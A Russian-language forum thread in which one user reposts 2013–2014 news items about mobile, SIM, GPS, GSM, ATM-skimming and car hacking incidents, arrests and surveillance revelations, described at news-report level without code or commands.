В центре мониторинга одного из операторов сотовой связи обнаружили странную активность. Клиенты из одного и того же места в городе неожиданно начали отправлять SMS на некоторый платный номер. Сложно объяснимая ситуация оказалась примером изящного мошенничества, от которого пострадали тысячи людей.
http://www.zamkidveri.com/forum/images/imported/2013/07/1-1.jpg

Итак, как это было сделано?

Шаг 1

В людном месте была припаркована газель с несколькими антеннами на крыше. Сканируя эфир Bluetooth, специальный ноутбук отправлял запрос на установку связи (pairing) всем обнаруженным устройствам. Ничего не подозревая, люди часто соглашались принять подключение.

Шаг 2

С помощью установленного соединения злоумышленники передавали на телефоны жертв последовательность AT-команд, отправляющую SMS-сообщения на платный номер. Чтобы не потерять связь, использовались мощные Bluetooth-антенны.

Шаг 3

Платный номер был арендован злоумышленниками для вывода денег через подставных лиц. Номер намеренно был выбран максимально «дешевым», чтобы жертвы не обращали внимание на небольшое изменение своего баланса.

Шаг 4

Для удаленного управления ноутбуками, с помощью которых проводилась атака, злоумышленники использовали TeamViewer. В газели находились лишь мало что понимающие исполнитель и водитель. Они были арестованы. Организатор схемы пока на свободе

SAWWA
22.07.2013, 15:04
Уязвимость в сим-картах позволяет украсть "цифровую личность"
РИА "Новости"
Найдена уязвимость в безопасности некоторых SIM-карт, дающая возможность установить сторонний контроль над мобильным телефоном, сообщает издание The New York Times.



Основатель Security Research Labs Карстен Нол (Karsten Nohl) заявил, что технология шифрования, которая применяется в некоторых SIM-картах, имеет серьезную уязвимость. "Дыра" в безопасности позволяет злоумышленникам получить 56-значный цифровой ключ доступа к чипу устройства, зная который, можно заразить мобильный телефон вирусом, послав его в простом текстовом сообщении.

В качестве эксперимента Карстен Нол таким способом получил управление мобильным телефоном "жертвы" и смог совершать от ее имени покупки посредством платежных систем. Вся операция заняла у "взломщика" не более двух минут, при этом использовался обычный персональный компьютер.

Прослушивать разговоры, читать переписку, скопировать всю информацию с SIM-карты, полностью украсть "цифровую личность" владельца телефона — все это можно сделать, имея в своем распоряжении упомянутый цифровой ключ. По оценке эксперта, подобного рода атакам рискуют подвергнуться порядка 750 миллионов устройств по всему миру.

Карстен Нол не сообщил, SIM-карты каких операторов наиболее уязвимы для взлома. По его словам, данная информация не будет озвучена и на конференции Black Hat, посвященной вопросам безопасности, которая пройдет в августе. Сравнительный анализ защиты различных SIM-карт можно ожидать в декабре 2013 года, в рамках хакерской конференции Chaos Communication Congress в Гамбурге.
\\

на самом деле всё зависит от партии СИМ-карт , в частности - от особенностей их архитектуры и версий прошивки, тот или иной способ взлома будет заточен под известные потенциальные дыры в протоколе безопасности.



в очередной раз убеждаемся в ничтожности электронных оков, опутавших мир

SAWWA
24.07.2013, 15:08
http://www.youtube.com/watch?v=MRNbF6ljR4E

время воров с ломами и кувалдами уходит

SAWWA
27.07.2013, 03:17
В Чувашии задержаны подозреваемые в совершении мошенничества с использованием электронно-считывающего устройства
25 Июля 17:31
В июле в Чебоксарах в терминале одного из банков двое мужчин установили считывающий аппарат - скиммер. С помощью устройства они получили информацию о персональных данных и пин-кодах электронных карт оплаты граждан. Об этом стало известно службе безопасности банка, сотрудники которой обратились в полицию. Камера видеонаблюдения, установленная в помещении банкомата, четко зафиксировала лица злоумышленников.
В течение нескольких дней сотрудники управления уголовного розыска и отдела «К» МВД республики установили преступную схему, по которой действовали злоумышленники.
Бойцы полицейского спецназа задержали мужчин в тот момент, когда они сняли с банкомата скиммер и вернулись к машине.
Сейчас установлено, что оба злоумышленника – им по 48 лет – являются уроженцами Молдовы, проживают в Москве. Один из них был судим за разбойное нападение.
В ходе задержания у них были изъяты - скиммер, три флэш-карты и два сотовых телефона.
В отношении злоумышленников по факту мошенничества возбуждено уголовное дело. Полицейские не исключают их причастность к совершению аналогичных преступлений на территории других регионов страны.
Пресс-служба МВД по Чувашской Республике

SAWWA
30.07.2013, 04:06
Хакер, нашедший "дыру" в кардиостимуляторах, умер при таинственных обстоятельствах за неделю до выступления
Сергей Попсулин, CNews
Бэрнеби Джек (Barnaby Jack), известный хакер, программист и специалист по информационной безопасности, умер в минувший четверг в Сан-Франциско в возрасте 35 лет при неизвестных обстоятельствах, сообщает Reuters.

Джек скончался за несколько дней до своего выступления на конференции Black Hat в Лас-Вегасе, которое должно было состояться 1 августа.

Здесь он планировал выступить с докладом об уязвимостях в кардиостимуляторах, которые позволяют дистанционно, по беспроводной связи на расстоянии около 9 метров, подать в кардиостимулятор команду, которая пошлет на сердце разряд в 830 вольт и убьет пациента.

Джек также нашел способ перепрограммирования кардиостимулятора так, чтобы смерть наступила спустя заданное время.

Кроме того, он предположил, что с помощью встроенного модуля беспроводной связи такое устройство могло бы "заражать" кардиостимуляторы других людей в радиусе действия и, таким образом, вызывать смертельную эпидемию. Свои находки Джек впервые представил на хакерской конференции BreakPoint в Мельбурне в октябре 2012 года.

Хакер не сообщил название производителя, в кардиостимуляторах которого он обнаружил уязвимости. Недавно в интервью Reuters Джек заявил, что работает с этой компанией над повышением безопасности ее медицинских устройств.

В 2011 г. на конференции RSA Security Conference Джек продемонстировал способ взлома инсулиновой помпы, которая автоматически вводит препарат в организм пациента при лечении сахарного диабета. Он обнаружил уязвимость, которая позволяет управлять электронным устройством на расстоянии около 90 м и вводить с его помощью в организм пациента смертельную дозу препарата.

Уязвимость была обнаружена в устройствах компании Medtronic. Позже Medtronic была вынуждена нанять сторонних специалистов для оценки безопасности своих продуктов.

Бэрнеби Джек стал широко известен в 2010 г. после доклада об уязвимостях в банкоматах, которые позволяют снимать всю имеющуюся наличность. Позже разработчики программного обеспечения для банкоматов устранили эти уязвимости.

Перед смертью Джек работал специалистом по безопасности в компании IOActive. Многие люди, которые его знали, высказали в интернете слова сочувствия в связи с его уходом из жизни, отметив, что он был хорошим человеком.

В блогосфере отмечают, что смерть Джека является не первой неожиданной и необъяснимой смертью американского гражданина с начала года. В январе 2013 года был найден мертвым в Нью-Йорке Аарон Шварц, интернет-активист, который выступал за свободное распространение информации, в том числе об американском правительстве. Официально причиной смерти 26-летнего Шварца было названо самоубийство.

SAWWA
30.07.2013, 04:21
"Белтелеком" внедрил защиту от телефонных мошенников, подменявших номера при заграничных звонках
Читать полностью: http://it.tut.by/359430


Время от времени белорусы сталкивались с необычным явлением: звонки из-за границы (от зарубежных абонентов и от белорусов в роуминге) поступали не со знакомых номеров, а с "подставных" с белорусским кодом +375хх. Компания "Белтелеком" сообщила 29 июля о внедрении эффективного средства по борьбе с мошенничеством, симптомом которого является такая подмена номера.

В июне 2013 года РУП "Белтелеком" запустил антифродовую систему на базе оборудования и программного обеспечения компании "cVidya" (Израиль). Данная система позволяет, в частности, бороться и с таким видом мошенничества, как незаконная IP-телефония.

"Белтелеком" предупреждает: если при поступлении звонков из-за границы отображается незнакомый белорусский номер или вообще отсутствует информация о входящем звонке, а качество соединения – неудовлетворительное, абонент сталкивается с незаконной терминацией телефонного голосового трафика.

В данном случае соединения проходят через сеть Интернет, а затем переводятся в телефонную сеть общего пользования. При этом используется специальное оборудование, так называемые "голосовые шлюзы". Они позволяют вывести телефонный разговор в сеть Интернет, передать его на расстояние и принять в любой точке телефонной сети.

Отличительными особенностями оборудования является возможность выявления мошеннических операций в режиме реального времени за счет использования данных на уровне обмена сигнальной информацией между АТС. Закупленное программное обеспечение позволяет проводить анализ поведения абонента в течение различного периода времени.

Данные о неправомерном использовании сервисов и услуг, полученные от антифродовой системы, передаются правоохранительным органам для принятия мер административной и уголовной ответственности.
Читать полностью: http://it.tut.by/359430

SAWWA
07.08.2013, 02:42
http://www.3dnews.ru/658201
Сигнал мобильного телефона является уникальным идентификатором

06.08.2013 [15:00], Константин Ходаковский
Исследователи Дрезденского технического университета разработали удивительно надёжный метод отслеживания, который в состоянии удалённо идентифицировать отдельные GSM-аппараты на основе уникальных характеристик их радиосигналов, даже если идентификационные коды телефона или SIM-карты были сознательно изменены.
В лабораторных тестах, приближенных к реальным условиям, исследователи могли идентифицировать 13 отдельных мобильных телефонов с очень высокой долей вероятности — 97,62% случаев. Это весьма впечатляющий первоначальный результат, причём команда разработчиков уверяет, что это лишь первый шаг на пути этого типа удалённой идентификации устройств.
Метод базируется на погрешностях процесса производства, создающего вариации (различные ошибки и отклонения) в электронике каждого мобильного устройства. Исследователь Якоб Хассе (Jakob Hasse) отметил в беседе с журналом New Scientist, что радиооборудование в сотовых телефонах состоит из целого ряда компонентов вроде усилителей мощности сигнала, излучателей, смесителей сигналов, причём все они могут влиять на неточность конечного сигнала после цифро-аналогового преобразования.
Весьма важно и то, что упомянутый метод слежения функционирует, по словам разработчиков, целиком в пассивном режиме — регистрирующее устройство ничего не излучает, а лишь принимает и анализирует передаваемые мобильными аппаратами радиоизлучения. Другими словами, обнаружить этот тип наблюдения невозможно.
До настоящего времени исследователи проверяли работу технологии только на смартфонах 2G (GMS), однако господин Хассе подчёркивает, что всё вышесказанное точно также относится и к мобильным устройствам, работающим в сетях 3G и 4G — производственные дефекты никуда не исчезают, и влияют на характер излучения, создавая, по сути, «опечатки пальцев» для каждого смартфона.
Каждый телефон состоит из массы компонентов, минимальные отклонения и отличия в которых создают уникальные характеристики сигнала
Отмечается, что метод технически весьма требователен к ресурсам, но он может оказаться полезен в ряде случаев при судебных расследованиях и в деятельности правоохранительных органов — сотовые телефоны можно будет отслеживать не только по SIM-картам, идентификаторам мобильного оборудования IMEI или другим характеристикам, которые могут изменяться или подделываться. Особенно, если точность метода будет доведена или максимально приближена к 100%.http://www.zamkidveri.com/forum/images/imported/2013/08/gfxiogr2-1.jpg

SAWWA
08.08.2013, 03:00
КАК УГНАТЬ МИЛЛИОН: ВЗЛОМ ПО GPS
Недавно у побережья Италии была угнана роскошная, ультрасовременная яхта. В полицию никто не обращался: угон стал результатом заранее согласованных испытаний, проведенных командой американских технологов. За несколько лет работы они создали систему, позволяющую подделать сигналы системы GPS.

В системе глобальной навигации GPS используются сигналы, приходящие со спутников, работающих на орбитах высотой порядка 20 тыс. км. Навигатор самым точным образом фиксирует время прохождения сигнала от каждого из доступных спутников и вычисляет расстояние до них, что позволяет установить и собственное положение в пространстве с точностью до нескольких метров. Чтобы вмешаться в работу этой системы, авторы решили создать ложные сигналы, которые заставляли бы ее вычислять неверное положение и направление движения.

Для работы GPS-навигатору требуется получать сигналы минимум с четырех спутников, каждый дополнительный позволяет лишь делать более точные вычисления. В открытом море видимость спутников выше, чем на суше, и число их доходит до десяти. Это, разумеется, усложняет задачу по обману системы. Если «подменить» сигнал лишь одного спутника, система просто отбросит его, как случайную ошибку. Если противоречить остальным будут сигналы целой группы спутников, она воспримет это как атаку. Поэтому авторам пришлось имитировать сигналы всей группировки GPS.

На верхней палубе яхты было установлено устройство, создающее ложные сигналы для каждого из спутников GPS, более мощные, чем его собственные. Убедившись в том, что система «проглотила» эти сигналы, ученые стали менять их, «убеждая» компьютеры яхты в том, что она сбилась с курса (хотя в реальности она двигалась в точности как необходимо). Компьютер автоматически корректировал курс, уводя яхту туда, куда в итоге хотели «угонщики». В принципе, и команда могла не заметить происходящего: на информационных экранах обманутая система показывала совершенно прямую траекторию движения.

Несмотря на то что в этот раз система, создающая ложный сигнал, была размещена на самой яхте, разработчики ее уверяют, что того же можно добиться и с дистанции в несколько километров. Потратив на ее создание несколько лет, авторы замечают, что «если эта схема просочится наружу, она может стать серьезной проблемой для мировых морских перевозок».

По публикации Computerworld
http://www.computerworld.com/s/article/9241236/Spoofed_Fake_GPS_signals_lead_yacht_astray

Добавлено: 07.08.13

SAWWA
04.09.2013, 13:20
Такой изящный способ нарушить работу сети GSM, в частности, систем безопасности при помощи простого доступного в изготовлении оборудования, это не глушилка, а более изящный способ:

Журнал Хакер


Взломанные мобильники серии Motorola C1 способны нарушить работу сотовой сети

Исследователи из Технического университета Берлина на хакерской конференции Usenix Security Symposium продемонстрировали новый способ атаки на мобильные сети GSM. Атака предусматривает подделку ответов пэйджинга (paging response attack) с мобильного телефона.

Пэйджинг — это один из этапов маршрутизации вызова в сотовой сети. Он включает в себя отправку широковещательного сообщения (paging request) на всю территорию трансляции сотовой станции с указанием уникального номера (TMSI) вызываемого аппарата. Мобильный телефон, в свою очередь, постоянно прослушивает канал, а когда заметит свой TMSI, то отвечает сообщением для установки канала связи. В крупном городе вроде Берлина количество таких широковещательных запросов в сети крупного оператора сотовой связи достигает 1200 в минуту.

В нормальных условиях только один аппарат отвечает сообщением для установки канала связи, но немецким хакерам удалось модифицировать прошивку Motorola таким образом, что телефон пытается ответить на все вызовы paging request, нарушая нормальную работу сотовой сети.

На видео (block phone calls or SMS via GSM paging procedure race condition) показан старый телефон Motorola, с которого осуществляется атака. После активации новой версии прошивки этот телефон способен эффективно блокировать звонки и SMS на другие телефонные аппараты в зоне действия данной базовой станции GSM.

Подробнее см. слайды доклада (https://www.usenix.org/conference/usenixsecurity13/let-me-answer-you-exploiting-broadcast-information-cellular-networks) и статью с техническим описанием (pdf) (https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_golde.pdf).

Осуществить этот взлом удалось благодаря тому, что несколько лет назад в открытый доступ просочилась техническая документация на процессор Vitelcom TSM30, так что исследователям удалось изучить, как реализован GSM-стек и внести необходимые изменения (http://www.sec.t-labs.tu-berlin.de/~nico/fun_with_paging_4f0acac4c1fa538082f54cb14bef0841aa 9c8abb.diff). Берлинские хакеры создали новую версию прошивки для телефонов серии Motorola C1 (например, C118, C119, C123).

Один телефон способен отвечать примерно на 1 запрос в секунду. По оценке авторов, всего 11-ти взломанных аппаратов достаточно, чтобы блокировать сотовую связь в сети мелкого оператора в городе вроде Берлина (660 запросов в минуту). Благодаря сделанным модификациям, телефоны с самодельной прошивкой OsmocomBB отвечают на запросы базовой станции быстрее всех. На графике показана скорость ответа на запросы аппаратов разных производителей с разными чипсетами BB.

SAWWA
04.09.2013, 13:38
Журнал Хакер
Доступно всем в Интернете - 23 авг. 2013 г.

Насколько опасен TPM 2.0 — «встроенный бэкдор» в Windows 8.1

Немецкие эксперты предупреждают правительство, что переход на операционную систему Windows 8.1 несет в себе «неприемлемый риск». Дело в том, что компьютеры с этой ОС поддерживают функцию Trusted Computing с установкой чипа Trusted Platform Module (TPM).

Если раньше поддержка TPM была опциональной и отключаемой, то с переходом на спецификации TPM 2.0 (https://www.trustedcomputinggroup.org/resources/tpm_20_library_specification_faq) этот стандарт станет обязательным для всех устройств под Windows 8.1 и функция не подлежит дезактивации.

Trusted Platform Module (TPM) — криптопроцессор, в котором хранятся криптографические ключи для защиты информации. Библиотека TPM в операционной системе предназначена для проверки цифровой подписи программ, для установки апдейтов в дистанционном режиме и т.д. Фактически, компьютер с TPM 2.0 нельзя рассматривать как устройство, находящееся под полным контролем пользователя..

Спецификации TPM разработаны некоммерческой организацией Trusted Computing Group, в которую входят только американские компании AMD, Cisco, Hewlett-Packard, IBM, Intel, Microsoft и Wave Systems.

Немецкое издание Die Zeit получила в свое распоряжение внутренние документы (http://www.zeit.de/digital/datenschutz/2013-08/trusted-computing-microsoft-windows-8-nsa/seite-1) правительства Германии, которые содержат оценку безопасности TPM 2.0 со стороны независимых экспертов. Они предупреждают, что TPM можно рассматривать как бэкдор и есть большая вероятность, что доступ к криптографическим ключам имеет Агентство национальной безопасности.

Недавно компания Microsoft объявила, что с января 2015 года поддержка стандарта TPM 2.0 станет обязательной (http://www.zdnet.com/new-bluetooth-audio-tpm-requirements-coming-for-windows-8-devices-7000018003/) для всех сертифицированных устройств Windows. В конце июня были скорректированы документы для сертификации (http://msdn.microsoft.com/en-us/library/windows/hardware/hh748188.aspx), в соответствии с новыми требованиями на 2014 и 2015 годы.

UPD 23.08.2013. Федеральное управление по информационной безопасности Германии опубликовало официальное заявление (http://www.bmi.bund.de/SharedDocs/Downloads/DE/Themen/OED_Verwaltung/Informationsgesellschaft/trusted_computing_eng.pdf?__blob=publicationFile), в котором опровергло информацию о том, что ее эксперты когда-либо предупреждали кого-либо об опасности установки Windows 8, хотя и признали наличие некоторых сомнений относительно связки Windows 8 с аппаратным обеспечением TPM 2.0.

SAWWA
09.09.2013, 01:07
www. deutsche welle.de Спецслужбы США научились проникать в любые смартфоны

8 сентября 2013
РБК
Агентство национальной безопасности США может проникать в операционные системы и считывать данные со смартфонов любого вида - от iPhone до Android и Blackberry. Об этом передает Deutsche Welle со ссылкой на секретные материалы спецслужбы, опубликованные в немецких СМИ.

Сообщается, что агентство может копировать списки контактов, SMS-сообщения, записные книжки, а также определять местонахождение владельца смартфона.

В соответствии с документами, оказавшимися в распоряжении немецких СМИ, продуктами каждого разработчика операционных систем мобильной связи в АНБ занимается отдельная группа специалистов. К примеру, для получения доступа в систему iPhone достаточно проникнуть в компьютер, с которым синхронизирован телефон. Мини-программы, так называемые скрипты, дают возможность считывать данные в 38 приложениях iPhone.

Эксперты АНБ также получили доступ и к считающимися особо надежными операционным системам Blackberry. С 2009г. спецслужба имеет возможность отслеживать SMS-сообщения с таких смартфонов.

За последние месяцы стало известно о многочисленных фактах слежки сотрудников АНБ за гражданами США и гостями страны. Немало информации о своей бывшей организации рассказал Эдуард Сноуден, который в настоящее время находится на территории Российской Федерации.

SAWWA
14.09.2013, 00:58
Полицейские Татарстана задержали скиммеров


В Казани и Набережных Челнах участились факты краж денежных средств с пластиковых карт граждан. Полицейские в ходе оперативной работы установили, что к похищениям причастна группа «скиммеров», которая монтировала на банкомат устройство, считывающее с магнитной ленты всю информацию, в том числе ПИН-код и сохраняющее ее в своей памяти.

Полицейские МВД по Республике Татарстан определили банкоматы, с которых чаще всего считывалась информация. С начала сентября за ними было установлено круглосуточное наблюдение.

В Набережных Челнах сотрудники полиции зафиксировали, как двое подозреваемых установили на один из банкоматов «скимминговое» оборудование.

Спустя два часа те же злоумышленники вернулись, забрали свое устройство. После того, как они сели в машину, полицейские блокировали все выезды для иномарки и задержали двух злоумышленников. Одним из них оказался 29-летний житель г. Казани, второй – 32-житель г. Набережные Челны. Оба – весной 2013 года освободились из мест лишения свободы.

По местам жительства подозреваемых сотрудники полиции провели обыски, в ходе которых изъято оборудование для изготовления поддельных карт, незаконного копирования компьютерной информации, содержащейся на банковских картах, ноутбук, планшетные компьютеры, магнитные носители информации.

В отношении задержанных возбуждено уголовное дело по нескольким статьям УК России, подозреваемые находятся под стражей.

Пресс-служба МВД по Республике Татарстана

mvd. ru

SAWWA
16.09.2013, 02:17
Всё, о чём не мечтало прогрессивное человечество свершилось!
в настоящее время осуществляется плавный переход от механических замков к электронным иэто правильно, ворам работать будет проще..

теперь каждый относительно честный гражданин может собрать кое какую нужную в хозяйстве штучку и смело совершать опустошительные набеги на холодильник и обносить вместительный погребок любимых соседей..


Игрушка за $20 взламывает беспроводные замки и домашнюю сигнализацию //15.09.2013
Дешевые системы охранной сигнализации, дверные замки и беспроводные выключатели — все эти приборы можно взломать с помощью простенькой игрушки за 20 долларов от компании Dangerous Prototypes. Прибор USB Infrared Toy работает как репликатор инфракрасного сигнала, и собрать такую схему можно даже самостоятельно из конструктора Arduino.
http://www.zamkidveri.com/forum/images/imported/2013/09/toy-1.jpg

Нужно разместить USB Infrared Toy в прямой видимости от взламываемого устройства. В момент его включения или выключения «игрушка» перехватит и зафиксирует инфракрасный сигнал, а затем сможет его воспроизвести.

Инфракрасный сигнал используется в большом количестве дешевых электронных устройств и разнообразных пультов управления, так что USB Infrared Toy может оказаться полезным инструментом в арсенале пентестера.
по материалам хакер. ru

SAWWA
21.09.2013, 02:21
Ростовские полицейские задержали мужчину по подозрению в краже миллиона рублей
20 Сентября 15:22
В отдел полиции № 6 Управления МВД России по городу Ростову-на-Дону обратились сотрудники одного из банков. Они сообщили, что из-за сбоя программы банкомата их клиент вместо 200 тысяч снял миллион и присвоил их.
Полицейские установили, что мужчина является владельцем золотой карты кредитного учреждения, на которой хранилось порядка двухсот тысяч рублей. Обналичить он собирался всего 40. Когда житель донской столицы ввел необходимые комбинации цифр, вместо 40 тысячных купюр банкомат выдал столько же пятитысячных. Он повторил комбинацию еще 4 раза, после чего скрылся.
Полицейские задержали мужчину. В отношении него решается вопрос о возбуждении уголовного дела по статье «Кража».
Пресс-служба ГУ МВД по Ростовской области
mvd.ru

SAWWA
09.12.2013, 01:46
Европейский центр по борьбе с киберпреступностью Европола объявил о задержании группы мошенников, с территории Латвии воровавших деньги с кредиток по всему миру. Европол задержал группу латвийских киберпреступников.

Задержание прошло при помощи полиции Латвии, Эстонии, Польши, Болгарии, Испании, Литвы, Норвегии и Великобритании.



Всего арестованы 8 ключевых преступной группы. По данным следствия, мошенники работали с электронными платежами с использованием платежной базы данных европейской системы misusing в таких странах, как Мексика, Таиланд, США и Доминикана.


Предположительный ущерб от мошенников составляет сотни тысяч евро.


Согласно статистике Европейского центрального банка, около 20% от общего числа мошенничеств с платежными картами (232 млн евро) приходится на махинации с банкоматами, около 25% (290 млн) — при работе с терминалами, точками продажи, более 50% (655 млн) — на онлайн-покупки через Интернет.


* * *

И еще одна новость о задержании киберпреступников. При помощи «банковских троянов» группа российских хакеров из 13 человек похитила со счетов физических и юридических лиц в кредитных организациях нескольких регионов 70 млн рублей, сообщила пресс-служба Следственного департамента МВД России.

Подозреваемые в создании и участии в преступном сообществе задержаны, в их числе и создатель системы, позволявшей проникать вредоносной программе в компьютеры банков.

От действий хакеров пострадали клиенты банков в Москве, Тюмени, Ульяновске, Краснодаре, Петрозаводске и Курской области. По данным следствия, преступное сообщество действовало на территории РФ с 2011 года. Оно распространяло в интернете вредоносное ПО («банковские трояны») с последующим несанкционированным доступом к логинам, паролям, электронным ключам и сертификатам.

Затем информация с зараженных компьютеров направлялась на специально созданные контрольно-командные серверы, говорится в сообщении МВД. Используя украденные сведения, преступники отправляли в банки подложные платежные поручения от имени владельцев счетов, в которых в качестве получателей денежных средств указывались реквизиты физических и юридических лиц, подконтрольных членам преступного сообщества.

Следственный департамент МВД России начал уголовное дело по ч.ч. 1,2 ст. 210 УК РФ (создание и участие в преступном сообществе (преступной организации) в целях совместного совершения одного или нескольких тяжких или особо тяжких преступлений).

criminalnaya.ru

SAWWA
24.12.2013, 19:07
Ведущий мировой разработчик шифров сделал "дыру для прослушки" за взятку от властей США4 комментария

24 декабря 2013 в 8:00
Сергей Попсулин, CNews
Агентство национальной безопасности США заплатило 10 млн долларов американскому разработчику технологий безопасности RSA Security для установки бэкдора в ее программное обеспечение, сообщает Reuters со ссылкой на очередной пакет документов, раскрытый бывшим системным администратором АНБ Эдвардом Сноуденом.



Компания RSA Security была основана в 1982 году. В 2006 году за 2,1 млрд долларов ее приобрела корпорация EMC, и сейчас RSA функционирует как ее бизнес-подразделение.

Согласно секретным договоренностям с АНБ, компания RSA Security предложила своим клиентам в качестве алгоритма шифрования по умолчанию в BSafe заведомо ненадежный алгоритм генерации псевдослучайных чисел Dual EC DRBG.

Утилита, о которой идет речь, предназначена для шифрования данных на персональных компьютерах и во множестве других продуктов. Как утверждает разработчик, утилита удовлетворяет самым строгим требованиям безопасности и может быть использована в оборонной сфере. Решением RSA BSafe пользуются известные мировые компании, включая Adobe, Oracle, Sony и Nintendo.

Внедрение бэкдора АНБ было нужно для того, чтобы, при необходимости, специалисты ведомства могли без особых сложностей, расшифровав закодированный трафик, осуществлять прослушку защищенных каналов связи.

В сентябре 2013 году газета The New York Times сообщила, что RSA намеренно сделала алгоритм шифрования Dual EC DRBG в BSafe алгоритмом по умолчанию, для того чтобы облегчить работу спецслужб по дешифровке. После этой публикации в RSA рекомендовали своим клиентам отказаться от использования указанного алгоритма и выбрать любой другой, доступный из набора.

В ответ на последнюю публикацию в компании заявили, что сотрудничают с АНБ, как и любая другая компания высокотехнологичной отрасли, и делают это открыто, ничего не скрывая. В компании опровергли информацию о соглашении с АНБ. Разработчики рассказали, что выбор алгоритма Dual EC DRBG в 2004 году не был продиктован требованиями какой-либо другой стороны и был осуществлен по той причине, что он предлагал надежный и перспективный механизм защиты.

Ранее возникали подозрения, что АНБ приложило руку к созданию генератора псевдлслучайных чисел RDRAND. Это послужило причиной сбора подписей за исключение данного гененатора из ядра Linux. Однако создатель Linux Линус Товальдс успокоил сообщество, указав на то, что RDRAND используется лишь как один из множества источников в пуле случайных чисел, поэтому, даже если он скомпрометирован АНБ, это не представляет угрозы.

SAWWA
07.02.2014, 22:39
Хакеры разработали дешевое устройство для перехвата управления автомобилем
http://www.zamkidveri.com/forum/images/imported/2014/02/e0ee1aaa23641df9d740e4969c220d9d-1.jpg

Испанские специалисты разработали дешевое устройство, способное вмешиваться в работу бортового компьютера автомобиля и перехватывать управление им. Слабое звено устройства, цена комплектующих которого обходится всего в $20, заключается в необходимости установки его непосредственно в транспортном средстве — на это потребуется около пяти минут.
Управлять CAN Hacking Tool можно пока лишь с помощью Bluetooth, однако в новой версии появится модуль GSM, что значительно повысит эффективность устройства. «Наша цель заключается не в том, чтобы наладить массовое производство CHT и начать его продажи, мы лишь хотим продемонстрировать автопроизводителям уязвимость», — рассказали разработчики.
Время установки гаджета зависит от модели автомобиля: в некоторых случаях было достаточно забраться под их днище, в других — в багажник, однако доступ к диагностическому разъему в любом случае не требовался. Разработчики испытали устройство на различных транспортных средствах, однако не стали раскрывать, каких именно производителей. Им удалось перехватить управление фарами авто, сигнализацией, оборудованными электроприводом окнами, электронными системами управления тормозами, передает The Register.
CAN Hacking Tool будет представлена на конференции Black Hat Asia, которая пройдет в марте в Сингапуре.

SAWWA
08.03.2014, 00:18
Во Франции выкрали секретные планы и коды строящейся тюрьмы

9 марта 2009 в 16:47
Lenta.ru
Четыре ноутбука, содержащие секретную информацию, в том числе планы и коды новой тюрьмы во Франции, были украдены из офиса строительной компании в городе Нанси. Об этом сообщает AFP со ссылкой на источники во французской полиции.
http://www.zamkidveri.com/forum/images/imported/2014/03/turmafrpicture-1.jpg

Тюрьма, рассчитанная на 690 заключенных, должна была открыться этим летом. Точная дата начала ее работы до сих пор держится в секрете.

Кража произошла 27 февраля в промежуток между 12:00 и 14:00. Злоумышленники проникли в помещения, которые арендовала в жилом доме руководящая строительством тюрьмы компания Eiffage BTP.

Взломав дверь и окно на первом этаже здания, преступники вынесли четыре ноутбука с секретной информацией. Как отмечается, в тот момент никого из сотрудников компании на месте не было. Расследованием инцидента занялась прокуратура Нанси, представители пообещали предоставить более подробную информацию об инциденте позднее.

SAWWA
13.03.2014, 01:50
Эксперт разоблачил репортаж NBC о взломе всех компьютеров в Сочи
07.02.2014 13:40

Сотрудник компании Errata Security Роберт Грэм опроверг информацию о мгновенном взломе хакерами любых компьютеров, подключаемых к Сети в олимпийском Сочи. Ранее об угрозе взлома всех «гаджетов», используемых в городе, сообщил в своем репортаже телеканал NBC.
По словам Грэма, материал, подготовленный корреспондентом NBC Ричардом Энгелем, не имеет никакого отношения к действительности. «Единственное, что представляет опасность для пользователей Интернета в Сочи, это распространяющие вирусы сайты. Когда геолокационные сервисы Google узнают, что вы в России, количество российских ресурсов в вашей поисковой выдаче увеличивается. Часть из них, естественно, может содержать вредоносные элементы», — заявил Грэм. Всем приезжающим в Сочи гостям специалист посоветовал «не кликать на все подряд» и по возможности не подключаться к открытым Wi-Fi-сетям.
В то же время утверждения журналиста NBC Энгела о якобы мгновенно заражаемых российскими хакерами компьютерах Роберт Грэм назвал несостоятельными. По его словам, во-первых, журналист телеканала проводил тест на безопасность компьютерных данных, находясь не в Сочи, а в Москве. Во-вторых, отметил Грэм, «взлом» компьютера Энгела произошел после визита на посвященные Играм сайты, а не просто потому, что тот находился в России. «Такой взлом мог случиться и с техникой, находящейся в США», — пояснил автор поста. Единственный вывод, который можно сделать из этого репортажа, заключает Грэм, состоит в том, что не стоит отдавать свой телефон Ричарду Энгелу....
http :// www. fontanka.ru/2014/02/07/082/

SAWWA
14.03.2014, 01:27
http :// russian .rt.com/article/21669
Спецслужбы Великобритании и США могли взломать компьютер известного бельгийского криптографа
Власти Бельгии расследуют хакерскую атаку на компьютер широко известного специалиста по криптографии. Среди подозреваемых - АНБ США и Управление правительственной связи Великобритании, которые могли использовать полученную информацию в целях промышленного шпионажа. Разоблачения Эдварда Сноудена косвенно подтверждают это.

Жан-Жак Кискате, выдающийся эксперт по защите данных в Католическом университете Лувен, мог быть объектом шпионажа иностранных спецслужб на протяжении месяцев, сообщает ежедневная газета De Standaard.
Взлом его компьютера был обнаружен при расследовании хакерских атак, направленных против государственной телекоммуникационной фирмы Belgacom. Документы, переданные прессе Эдвардом Сноуденом, указывают на то, что за тайным проникновением в компьютеры компании, вероятно, стояло Управление правительственной связи.
Криптограф считает, что проникновение в его компьютер могло произойти в тот момент, когда он отвечал на сообщение в соцсети Linkedln. Он был перенаправлен на сайт-копию, его данные были считаны, а на компьютере была запущена программа-шпион. Целью взлома учёный считает промышленный шпионаж - сбор как можно большего объёма данных о гражданской криптографии.
Жан-Жак Кискате - обладатель 17 патентов; он считается одним из ведущих экспертов по обеспечению безопасности электронных платежей. Газета отмечает, что Кискате сотрудничал с компанией NXP, специализирующейся на защите электронного оборудования: её штаб-квартира находится в Нидерландах, а криптографическая лаборатория - в Бельгии. По данным De Standaard, именно технология NXP стояла на мобильном телефоне Ангелы Меркель, который, как показали разоблачения Сноудена, прослушивался Агентством национальной безопасности США.

SAWWA
02.04.2014, 23:22
Безопасный взлом?
Компания SafeNet обнародовала новую концепцию безопасности данных, которая исходит из того, что защититься от атаки невозможно

